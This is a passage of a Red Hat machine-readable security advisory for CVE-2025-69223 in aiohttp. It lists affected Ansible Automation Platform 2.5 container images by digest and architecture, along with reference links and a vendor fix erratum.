"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-69223"
},
{
"category": "external",
"summary": "RHBZ#2427456",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2427456"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-69223",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69223"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-69223",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69223"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a",
"url": "https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6mq8-rvhq-8wgg",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6mq8-rvhq-8wgg"
}
],
"release_date": "2026-01-05T22:00:17.715000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T22:34:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.5#Upgrading",
"product_ids": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6308"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
